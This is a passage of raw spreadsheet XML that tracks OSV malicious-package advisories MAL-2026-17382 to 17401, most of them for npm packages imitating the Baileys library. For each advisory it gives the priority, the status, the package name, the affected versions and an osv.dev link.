        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17382</t>
        </is>
      </c>
      <c r="D275" s="5" t="inlineStr"/>
      <c r="E275" s="5" t="inlineStr"/>
      <c r="F275" s="5" t="inlineStr"/>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="inlineStr"/>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K275" s="5" t="inlineStr"/>
      <c r="L275" s="5" t="inlineStr">
        <is>
          <t>npm:@wenzyx1/bails</t>
        </is>
      </c>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q275" s="5" t="inlineStr"/>
      <c r="R275" s="5" t="inlineStr"/>
      <c r="S27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@wenzyx1/bails (npm), version(s): 1.0.1, 1.0.0.</t>
        </is>
      </c>
      <c r="T275" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17382</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17383</t>
        </is>
      </c>
      <c r="D276" s="5" t="inlineStr"/>
      <c r="E276" s="5" t="inlineStr"/>
      <c r="F276" s="5" t="inlineStr"/>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="inlineStr"/>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K276" s="5" t="inlineStr"/>
      <c r="L276" s="5" t="inlineStr">
        <is>
          <t>npm:@xatancchii/velycxbail</t>
        </is>
      </c>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q276" s="5" t="inlineStr"/>
      <c r="R276" s="5" t="inlineStr"/>
      <c r="S27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@xatancchii/velycxbail (npm), version(s): 1.1.0.</t>
        </is>
      </c>
      <c r="T276" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17383</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17384</t>
        </is>
      </c>
      <c r="D277" s="5" t="inlineStr"/>
      <c r="E277" s="5" t="inlineStr"/>
      <c r="F277" s="5" t="inlineStr"/>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="inlineStr"/>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K277" s="5" t="inlineStr"/>
      <c r="L277" s="5" t="inlineStr">
        <is>
          <t>npm:@xayz/baileys</t>
        </is>
      </c>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q277" s="5" t="inlineStr"/>
      <c r="R277" s="5" t="inlineStr"/>
      <c r="S27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@xayz/baileys (npm), version(s): 6.1.8, 6.1.7, 6.1.6, 6.1.5, 6.1.4, 6.1.3, 6.1.2, 6.1.1, 6.1.0, 6.0.75, 6.0.6, 6.0.5, 6.0.4, 6.0.3, 6.0.2, 6.0.1, 6.0.0, 5.0.0, 4.0.0, 3.0.0.</t>
        </is>
      </c>
      <c r="T277" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17384</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17385</t>
        </is>
      </c>
      <c r="D278" s="5" t="inlineStr"/>
      <c r="E278" s="5" t="inlineStr"/>
      <c r="F278" s="5" t="inlineStr"/>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="inlineStr"/>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K278" s="5" t="inlineStr"/>
      <c r="L278" s="5" t="inlineStr">
        <is>
          <t>npm:albert-anitabaileys</t>
        </is>
      </c>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q278" s="5" t="inlineStr"/>
      <c r="R278" s="5" t="inlineStr"/>
      <c r="S27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albert-anitabaileys (npm), version(s): 1.1.13.</t>
        </is>
      </c>
      <c r="T278" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17385</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17386</t>
        </is>
      </c>
      <c r="D279" s="5" t="inlineStr"/>
      <c r="E279" s="5" t="inlineStr"/>
      <c r="F279" s="5" t="inlineStr"/>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="inlineStr"/>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K279" s="5" t="inlineStr"/>
      <c r="L279" s="5" t="inlineStr">
        <is>
          <t>npm:anuaja</t>
        </is>
      </c>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q279" s="5" t="inlineStr"/>
      <c r="R279" s="5" t="inlineStr"/>
      <c r="S27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anuaja (npm), version(s): 1.1.1, 1.1.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T279" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17386</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17387</t>
        </is>
      </c>
      <c r="D280" s="5" t="inlineStr"/>
      <c r="E280" s="5" t="inlineStr"/>
      <c r="F280" s="5" t="inlineStr"/>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="inlineStr"/>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K280" s="5" t="inlineStr"/>
      <c r="L280" s="5" t="inlineStr">
        <is>
          <t>npm:arsya-baileys</t>
        </is>
      </c>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q280" s="5" t="inlineStr"/>
      <c r="R280" s="5" t="inlineStr"/>
      <c r="S28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arsya-baileys (npm), version(s): 9.2.0.</t>
        </is>
      </c>
      <c r="T280" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17387</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17388</t>
        </is>
      </c>
      <c r="D281" s="5" t="inlineStr"/>
      <c r="E281" s="5" t="inlineStr"/>
      <c r="F281" s="5" t="inlineStr"/>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="inlineStr"/>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K281" s="5" t="inlineStr"/>
      <c r="L281" s="5" t="inlineStr">
        <is>
          <t>npm:baileys-xbats</t>
        </is>
      </c>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q281" s="5" t="inlineStr"/>
      <c r="R281" s="5" t="inlineStr"/>
      <c r="S28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baileys-xbats (npm), version(s): 1.0.3, 1.0.2, 1.0.1, 1.0.0.</t>
        </is>
      </c>
      <c r="T281" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17388</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17389</t>
        </is>
      </c>
      <c r="D282" s="5" t="inlineStr"/>
      <c r="E282" s="5" t="inlineStr"/>
      <c r="F282" s="5" t="inlineStr"/>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="inlineStr"/>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr">
        <is>
          <t>npm, go</t>
        </is>
      </c>
      <c r="K282" s="5" t="inlineStr"/>
      <c r="L282" s="5" t="inlineStr">
        <is>
          <t>npm:bungoma</t>
        </is>
      </c>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q282" s="5" t="inlineStr"/>
      <c r="R282" s="5" t="inlineStr"/>
      <c r="S28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bungoma (npm), version(s): 1.1.0, 1.0.1.</t>
        </is>
      </c>
      <c r="T282" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17389</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17390</t>
        </is>
      </c>
      <c r="D283" s="5" t="inlineStr"/>
      <c r="E283" s="5" t="inlineStr"/>
      <c r="F283" s="5" t="inlineStr"/>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="inlineStr"/>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K283" s="5" t="inlineStr"/>
      <c r="L283" s="5" t="inlineStr">
        <is>
          <t>npm:cantarella-baileys</t>
        </is>
      </c>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q283" s="5" t="inlineStr"/>
      <c r="R283" s="5" t="inlineStr"/>
      <c r="S28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cantarella-baileys (npm), version(s): 1.1.13, 1.1.12, 1.1.11.</t>
        </is>
      </c>
      <c r="T283" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17390</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17391</t>
        </is>
      </c>
      <c r="D284" s="5" t="inlineStr"/>
      <c r="E284" s="5" t="inlineStr"/>
      <c r="F284" s="5" t="inlineStr"/>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="inlineStr"/>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K284" s="5" t="inlineStr"/>
      <c r="L284" s="5" t="inlineStr">
        <is>
          <t>npm:eliteprotech-baileys</t>
        </is>
      </c>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q284" s="5" t="inlineStr"/>
      <c r="R284" s="5" t="inlineStr"/>
      <c r="S28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eliteprotech-baileys (npm), version(s): 1.1.2, 1.1.1, 1.1.0.</t>
        </is>
      </c>
      <c r="T284" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17391</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17392</t>
        </is>
      </c>
      <c r="D285" s="5" t="inlineStr"/>
      <c r="E285" s="5" t="inlineStr"/>
      <c r="F285" s="5" t="inlineStr"/>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="inlineStr"/>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K285" s="5" t="inlineStr"/>
      <c r="L285" s="5" t="inlineStr">
        <is>
          <t>npm:focashi</t>
        </is>
      </c>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q285" s="5" t="inlineStr"/>
      <c r="R285" s="5" t="inlineStr"/>
      <c r="S28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focashi (npm), version(s): 1.1.0.</t>
        </is>
      </c>
      <c r="T285" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17392</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17393</t>
        </is>
      </c>
      <c r="D286" s="5" t="inlineStr"/>
      <c r="E286" s="5" t="inlineStr"/>
      <c r="F286" s="5" t="inlineStr"/>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="inlineStr"/>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K286" s="5" t="inlineStr"/>
      <c r="L286" s="5" t="inlineStr">
        <is>
          <t>npm:ishumdz-bail</t>
        </is>
      </c>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q286" s="5" t="inlineStr"/>
      <c r="R286" s="5" t="inlineStr"/>
      <c r="S28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ishumdz-bail (npm), version(s): 1.0.16, 1.0.15, 1.0.14, 1.0.13, 1.0.11, 1.0.10, 1.0.9, 1.0.8, 1.0.7, 1.0.6, 1.0.4, 1.0.3, 1.0.2, 1.0.1.</t>
        </is>
      </c>
      <c r="T286" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17393</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17394</t>
        </is>
      </c>
      <c r="D287" s="5" t="inlineStr"/>
      <c r="E287" s="5" t="inlineStr"/>
      <c r="F287" s="5" t="inlineStr"/>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="inlineStr"/>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K287" s="5" t="inlineStr"/>
      <c r="L287" s="5" t="inlineStr">
        <is>
          <t>npm:kasabaileys</t>
        </is>
      </c>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q287" s="5" t="inlineStr"/>
      <c r="R287" s="5" t="inlineStr"/>
      <c r="S28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kasabaileys (npm), version(s): 1.0.2, 1.0.1, 1.0.0, 0.3.15.</t>
        </is>
      </c>
      <c r="T287" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17394</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17395</t>
        </is>
      </c>
      <c r="D288" s="5" t="inlineStr"/>
      <c r="E288" s="5" t="inlineStr"/>
      <c r="F288" s="5" t="inlineStr"/>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="inlineStr"/>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K288" s="5" t="inlineStr"/>
      <c r="L288" s="5" t="inlineStr">
        <is>
          <t>npm:keithbaileys</t>
        </is>
      </c>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q288" s="5" t="inlineStr"/>
      <c r="R288" s="5" t="inlineStr"/>
      <c r="S28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keithbaileys (npm), version(s): 1.1.1, 1.1.0, 1.0.8.</t>
        </is>
      </c>
      <c r="T288" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17395</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17396</t>
        </is>
      </c>
      <c r="D289" s="5" t="inlineStr"/>
      <c r="E289" s="5" t="inlineStr"/>
      <c r="F289" s="5" t="inlineStr"/>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="inlineStr"/>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K289" s="5" t="inlineStr"/>
      <c r="L289" s="5" t="inlineStr">
        <is>
          <t>npm:kiyoramarkets</t>
        </is>
      </c>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q289" s="5" t="inlineStr"/>
      <c r="R289" s="5" t="inlineStr"/>
      <c r="S28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kiyoramarkets (npm), version(s): 8.0.16.</t>
        </is>
      </c>
      <c r="T289" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17396</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17397</t>
        </is>
      </c>
      <c r="D290" s="5" t="inlineStr"/>
      <c r="E290" s="5" t="inlineStr"/>
      <c r="F290" s="5" t="inlineStr"/>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="inlineStr"/>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K290" s="5" t="inlineStr"/>
      <c r="L290" s="5" t="inlineStr">
        <is>
          <t>npm:levvleys</t>
        </is>
      </c>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q290" s="5" t="inlineStr"/>
      <c r="R290" s="5" t="inlineStr"/>
      <c r="S29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levvleys (npm), version(s): 2.1.0, 2.0.26, 2.0.25, 2.0.24, 2.0.23, 2.0.22, 2.0.21, 2.0.20, 2.0.19, 2.0.18, 2.0.17, 2.0.16, 2.0.13, 2.0.12, 2.0.11, 2.0.10, 2.0.9, 2.0.8, 2.0.6, 2.0.4.</t>
        </is>
      </c>
      <c r="T290" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17397</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17398</t>
        </is>
      </c>
      <c r="D291" s="5" t="inlineStr"/>
      <c r="E291" s="5" t="inlineStr"/>
      <c r="F291" s="5" t="inlineStr"/>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="inlineStr"/>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr">
        <is>
          <t>npm:lilys-baileys</t>
        </is>
      </c>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q291" s="5" t="inlineStr"/>
      <c r="R291" s="5" t="inlineStr"/>
      <c r="S29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lilys-baileys (npm), version(s): 1.3.3, 1.3.2.</t>
        </is>
      </c>
      <c r="T291" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17398</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17399</t>
        </is>
      </c>
      <c r="D292" s="5" t="inlineStr"/>
      <c r="E292" s="5" t="inlineStr"/>
      <c r="F292" s="5" t="inlineStr"/>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="inlineStr"/>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr">
        <is>
          <t>npm:monte-md-baileys</t>
        </is>
      </c>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q292" s="5" t="inlineStr"/>
      <c r="R292" s="5" t="inlineStr"/>
      <c r="S29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monte-md-baileys (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T292" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17399</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17400</t>
        </is>
      </c>
      <c r="D293" s="5" t="inlineStr"/>
      <c r="E293" s="5" t="inlineStr"/>
      <c r="F293" s="5" t="inlineStr"/>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="inlineStr"/>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K293" s="5" t="inlineStr"/>
      <c r="L293" s="5" t="inlineStr">
        <is>
          <t>npm:my-baileys</t>
        </is>
      </c>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q293" s="5" t="inlineStr"/>
      <c r="R293" s="5" t="inlineStr"/>
      <c r="S29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my-baileys (npm), version(s): 1.0.5, 1.0.4, 1.0.3, 1.0.2, 1.0.1.</t>
        </is>
      </c>
      <c r="T293" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17400</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17401</t>
        </is>
      </c>
